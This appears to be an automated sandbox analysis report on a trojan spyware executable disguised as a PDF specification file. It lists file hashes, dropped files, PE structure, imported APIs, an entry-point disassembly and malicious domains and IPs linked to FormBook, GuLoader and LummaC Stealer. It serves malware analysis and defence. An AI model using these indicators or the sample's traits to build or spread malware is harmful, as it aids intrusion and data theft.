                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:4
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@7/5@1/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 44
                                    • Number of non-executed functions: 289
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • VT rate limit hit for: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    No simulations
                                    No context
                                    Match  Associated Sample Name / URL  SHA 256  Detection  Threat Name  Link  Context
                                    www.topkapiescortg.xyz  Salmebogs(1).exe  Get hash  malicious  FormBook, GuLoader  Browse
                                    • 104.21.6.17
                                    Match  Associated Sample Name / URL  SHA 256  Detection  Threat Name  Link  Context
                                    CLOUDFLARENETUS  https://web1.zixmail.net/s/e?b=visionsfcu&m=ABDp2JMatf1efCmjdBwunEWp&c=ABAP8cyUaKYihS5n3iwA36rC&em=CMancinelli%40lgtlegal%2ecom  Get hash  malicious  Unknown  Browse
                                    • 1.1.1.1
                                    https://bb.vg/STDBANK  Get hash  malicious  Unknown  Browse
                                    • 172.67.178.54
                                    b6FArHy7yA.exe  Get hash  malicious  LummaC Stealer  Browse
                                    • 104.21.71.43
                                    #U25b6#Ufe0fPlayVoiceMessage9312.eml  Get hash  malicious  Unknown  Browse
                                    • 104.17.25.14
                                    Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msg  Get hash  malicious  Unknown  Browse
                                    • 104.18.37.193
                                    file.exe  Get hash  malicious  LummaC Stealer  Browse
                                    • 104.21.43.156
                                    file.exe  Get hash  malicious  LummaC Stealer  Browse
                                    • 172.67.165.166
                                    http://accounts.benefitt.best  Get hash  malicious  Unknown  Browse
                                    • 104.21.95.6
                                    https://receptive-comfortable-paw.glitch.me/  Get hash  malicious  Unknown  Browse
                                    • 172.66.46.218
                                    https://accounts.benefitt.best/representaton.aspx?sets=LTxWNUY5RiVSMCYtRDlSWU04MCAg  Get hash  malicious  Unknown  Browse
                                    • 104.21.95.6
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):287744
                                    Entropy (8bit):7.99436007823748
                                    Encrypted:true
                                    SSDEEP:6144:DOTHv7ZoVb35BDV02gDCWEyhDbD6pAM5AcQy8TjB+C7zWNgIfyG:STHaVt02gDCODqq/y8TRz0ZaG
                                    MD5:5AA7D981878855DDD4F92DF51FCDFB66
                                    SHA1:600FC49F12D1922E79779C28521325B9CA8EA1DA
                                    SHA-256:B9D2DDB8C9754044C842D980142F309FAE139094DA50CD67E7446634A432EA9B
                                    SHA-512:85518808025DA37FEC1517112C8563137665C1D5919C3FE1080A4C456BB04A3679C38DC341C0FA9DD7B728A31BD9628EA095E28729BA6A231CB1EABABCDC8F64
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\SysWOW64\newdev.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):135168
                                    Entropy (8bit):1.1142956103012707
                                    Encrypted:false
                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                    MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                    SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                    SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                    SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Process:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):287744
                                    Entropy (8bit):7.99436007823748
                                    Encrypted:true
                                    SSDEEP:6144:DOTHv7ZoVb35BDV02gDCWEyhDbD6pAM5AcQy8TjB+C7zWNgIfyG:STHaVt02gDCODqq/y8TRz0ZaG
                                    MD5:5AA7D981878855DDD4F92DF51FCDFB66
                                    SHA1:600FC49F12D1922E79779C28521325B9CA8EA1DA
                                    SHA-256:B9D2DDB8C9754044C842D980142F309FAE139094DA50CD67E7446634A432EA9B
                                    SHA-512:85518808025DA37FEC1517112C8563137665C1D5919C3FE1080A4C456BB04A3679C38DC341C0FA9DD7B728A31BD9628EA095E28729BA6A231CB1EABABCDC8F64
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):9740
                                    Entropy (8bit):7.624182970962337
                                    Encrypted:false
                                    SSDEEP:192:ldJIIApKw4NW+gVGTgcw+a0mpKpuqlgS8pR7xCEVJJDVdNQDAJaFP/rf:lPJApYNTwP0moDlgFtxJxduA8Fnrf
                                    MD5:532369FC4F248F5774CF6A3C0537A5FC
                                    SHA1:0D4F6CF28886D478E875FB04001D68CC11DEB7A7
                                    SHA-256:17477E3056C868843AD593B4A6F0BFBA407FA3686FD2B77538F190D268E69641
                                    SHA-512:6CB7C103667F2A3828FF34C8A1641852B57CD4AD3053370DE00F51D7E94D21681CB86C71694318960A1246FE09229385127B2398ACB2590BADCD353EB7B05C51
                                    Malicious:false
                                    Preview:EA06..p..L..Y..m9..f7...sc.Y'3+5..d... .$.o6.X.3{..c1...........`...@.K..f.%...r.lY........d...@.o..c..&...Lls....f.Y...b..-vm6.M@......7.l,........X..K ........g6Y......l..].M..p...9|....r.1..... ..$h.c.....#@...H,....`..m1.H.f.0...<zm6....!:.B...S..n..Y..s8.t.,.0....5....p....9.... ....d....`....1.....0..Y......./Z..-zu6...js8...zn........V)...#...Nf...N.^.:.....8.:..w.......8...}3.#..qd...g.`./....J.v.6.X.{......)....b..g.....`.Y..`...&.......x...u| ......l`=.%.f....f.9...,sp./..9....`..%.......;$..#..l.0./.m6.M@4.;$..K..4|.K..g.d....d.Nf.y....x.g.{ ..d..gSi...@}.<..3.....33+..uf..g6PC`..s....f.,..j........Y.......Y.,.r.Y. .f.e...8...@.2....;2.X.b..Lg@...... ....38...[........9e..,vf.....k3........#.0.....3b.Y.6pj.....Bvh.....@R...o9.4@9..NM..;4.X.n.:M.@..........c.P....3)..f.... ......8.a...g...B)..'f......j.b.X.@..u6..Bvl......).;...N@.;7.X...Cv0}.....g <..L..8.....g..@.@....`...f..!..Lf....l....B;8.X...c3.%..:...!...Gg ....,d..Yg..........c.....
                                    Process:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File Type:ASCII text, with very long lines (28698), with no line terminators
                                    Category:dropped
                                    Size (bytes):28698
                                    Entropy (8bit):3.577948780476917
                                    Encrypted:false
                                    SSDEEP:384:LAYzxrp0FwaI4EYVLXDXZZRdFHuTZ8d450i:LAYz7VaI4EYZDXZbHuGe50i
                                    MD5:6199BCBE4CE5C1DA7863BA24F414FC56
                                    SHA1:15D8C26190317BE5E5E16660F57AF28677E98E7A
                                    SHA-256:B9925B9C1E24CA05296D4AF98D74A007988C27763858F877EE1D960DA83C3AF0
                                    SHA-512:2FF4FD5338C3FEDCFCC4F01F4B3AF59B46673AD46EF53A35D0C63179D67B2AA04FB3E6572A7FAB399C1FCAB61ADF00A5529AB550CB6B6212D80171841D1F125D
                                    Malicious:false
                                    Preview:6255206955201y669cfd92fddd1311116768c97c111111779:5695c:76111111779:5e97cb83111111779:6699c97f111111779:569bc:76111111779:5e9dcb7d111111779:669fc944111111779:56:1c:43111111779:5e:3cb3f111111779:66:5c975111111779:56:7c:7d111111779:5e:9cb7d111111779:66:b44d1779:56:dc:7f111111779:9e55ggggggcb85111111779::657ggggggc975111111779:9659ggggggc:7d111111779:9e5bggggggcb7d111111779::65dggggggc93f111111779:965fggggggc:75111111779:9e61ggggggcb7d111111779::663ggggggc97d111111779:9665gggggg44d:779:9e67ggggggcb86111111779:66e1c984111111779:56e3c:76111111779:5ee5cb83111111779:66e7c944111111779:56e9c:43111111779:5eebcb3f111111779:66edc975111111779:56efc:7d111111779:5ef1cb7d111111779:66f344d1779:56f5c:72111111779:9e79ggggggcb75111111779::67bggggggc987111111779:967dggggggc:72111111779:9e7fggggggcb81111111779::681ggggggc97:111111779:9683ggggggc:44111111779:9e85ggggggcb43111111779::687ggggggc93f111111779:9689ggggggc:75111111779:9e8bggggggcb7d111111779::68dggggggc97d111111779:968fgggggg44d:779:5e91cb84111111
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.117540817102013
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File size:1'187'840 bytes
                                    MD5:0f4c38f8def111c7fdb237b985c66ca0
                                    SHA1:18add6ba22e3c62913161dd98a39458a9e753713
                                    SHA256:b06fc744b4cfd48aeda3eabc2cba8a079b02a9d908920b6944130c6b950e8891
                                    SHA512:7d2724eebaf4fbafa31a7f3e8f189c1aad265001b17d2a4fc003498cdc841c94b4169192cdd3052c928537962213193ce08a98a76b646f0b6152f6f863cf9ee5
                                    SSDEEP:24576:mtb20pkaCqT5TBWgNQ7ax93VR9PXPjqfjuLSn1Lq6A:TVg5tQ7ax9WjCSn1+5
                                    TLSH:C645CF1373DE8361C3725273BA65B701AE7B782506B5F96B2FD8093CE920122525EB73
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                    Icon Hash:aaf3e3e3938382a0
                                    Entrypoint:0x425f74
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x675156B9 [Thu Dec 5 07:31:05 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                    Instruction
                                    call 00007F41FCAFBFCFh
                                    jmp 00007F41FCAEEFE4h
                                    int3
                                    int3
                                    push edi
                                    push esi
                                    mov esi, dword ptr [esp+10h]
                                    mov ecx, dword ptr [esp+14h]
                                    mov edi, dword ptr [esp+0Ch]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007F41FCAEF16Ah
                                    cmp edi, eax
                                    jc 00007F41FCAEF4CEh
                                    bt dword ptr [004C0158h], 01h
                                    jnc 00007F41FCAEF169h
                                    rep movsb
                                    jmp 00007F41FCAEF47Ch
                                    cmp ecx, 00000080h
                                    jc 00007F41FCAEF334h
                                    mov eax, edi
                                    xor eax, esi
                                    test eax, 0000000Fh
                                    jne 00007F41FCAEF170h
                                    bt dword ptr [004BA370h], 01h
                                    jc 00007F41FCAEF640h
                                    bt dword ptr [004C0158h], 00000000h
                                    jnc 00007F41FCAEF30Dh
                                    test edi, 00000003h
                                    jne 00007F41FCAEF31Eh
                                    test esi, 00000003h
                                    jne 00007F41FCAEF2FDh
                                    bt edi, 02h
                                    jnc 00007F41FCAEF16Fh
                                    mov eax, dword ptr [esi]
                                    sub ecx, 04h
                                    lea esi, dword ptr [esi+04h]
                                    mov dword ptr [edi], eax
                                    lea edi, dword ptr [edi+04h]
                                    bt edi, 03h
                                    jnc 00007F41FCAEF173h
                                    movq xmm1, qword ptr [esi]
                                    sub ecx, 08h
                                    lea esi, dword ptr [esi+08h]
                                    movq qword ptr [edi], xmm1
                                    lea edi, dword ptr [edi+08h]
                                    test esi, 00000007h
                                    je 00007F41FCAEF1C5h
                                    bt esi, 03h
                                    jnc 00007F41FCAEF218h
                                    movdqa xmm1, dqword ptr [esi+00h]
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2012 UPD4 build 61030
                                    • [RES] VS2012 UPD4 build 61030
                                    • [LNK] VS2012 UPD4 build 61030
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x58efc | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11d000 | 0x6c4c | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0xc4000 | 0x58efc | 0x59000 | e5502f904e4bab6f3de98da62304ddd0 | False | 0.9261982092696629 | data | 7.890376236144213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x11d000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                    RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                    RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                    RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                    RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                    RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                    RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                    RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                    RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                    RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                    RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                    RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
                                    RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                    RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                    RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                    RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                    RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                    RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                    RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                    RT_RCDATA | 0xcc7b8 | 0x50202 | data | | | 1.0003382145925885
                                    RT_GROUP_ICON | 0x11c9bc | 0x76 | data | English | Great Britain | 0.6610169491525424
                                    RT_GROUP_ICON | 0x11ca34 | 0x14 | data | English | Great Britain | 1.25
                                    RT_GROUP_ICON | 0x11ca48 | 0x14 | data | English | Great Britain | 1.15
                                    RT_GROUP_ICON | 0x11ca5c | 0x14 | data | English | Great Britain | 1.25
                                    RT_VERSION | 0x11ca70 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                    RT_MANIFEST | 0x11cb4c | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                                    DLL | Import
                                    WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                    VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                    WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                    MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                    WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                    PSAPI.DLL | GetProcessMemoryInfo
                                    IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                    USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                    UxTheme.dll | IsThemeActive
                                    KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                    USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                    GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                    COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                                    ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                    SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                    ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                    OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                    Language of compilation system | Country where language is spoken | Map
                                    English | Great Britain |
